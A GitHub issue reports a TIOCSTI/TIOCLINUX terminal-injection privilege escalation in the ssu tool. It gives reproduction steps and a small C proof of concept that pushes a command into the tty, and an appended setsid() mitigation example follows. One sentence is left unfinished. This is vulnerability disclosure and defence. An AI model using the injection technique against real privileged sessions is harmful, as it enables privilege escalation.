[Git master] Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX #13

Open
@hartwork

Hi!

I believe that ssu is vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX. Here is how to see it in action:

```console
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://github.com/illiliti/ssu
$ cd ssu/
$ git rev-parse HEAD  # 606a96b542bb16bd1f4c20058477994f75186fc9
$ make
$ sudo chown root:root ./ssu
$ sudo chmod u+s ./ssu
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>

int main(void) {
  const char *text = "id\n";
  while (*text)
    ioctl(0, TIOCSTI, text++);
  return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./ssu -u nobody /tmp/TIOCSTI  # runs id(1) as ${USER} rather than nobody
```

Please note that:

Best, Sebastian
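
One mitigation for the behaviour reported above, as an added example that is not part of the original issue and is not ssu's code: start the command in a new session with `setsid()` so it has no controlling terminal, which makes the Linux kernel reject TIOCSTI and TIOCLINUX from a caller without CAP_SYS_ADMIN. `run_detached` is a hypothetical helper, and the privilege drop a su-like tool performs is omitted.

```c
/* Added example, not ssu's code: run a command in a new session so it has
 * no controlling terminal when it starts. */
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper. Returns the command's exit status, 128+signal if it
 * was killed by a signal, or -1 if fork/wait failed. */
int run_detached(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* The child is never a process group leader, so setsid() succeeds.
         * The new session has no controlling terminal; the kernel then
         * answers TIOCSTI and TIOCLINUX on the inherited tty fds with EPERM
         * unless the caller has CAP_SYS_ADMIN. */
        if (setsid() == (pid_t)-1)
            _exit(126);
        /* A su-like tool would drop to the target uid/gid here (omitted). */
        execvp(argv[0], argv);
        _exit(127);                 /* exec failed */
    }

    int status;
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;
    }
    if (WIFEXITED(status))
        return WEXITSTATUS(status);
    return WIFSIGNALED(status) ? 128 + WTERMSIG(status) : -1;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    return run_detached(argv + 1);
}
```

The command loses job control on the caller's terminal; allocating a separate pty for it is the alternative when an interactive shell is needed.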
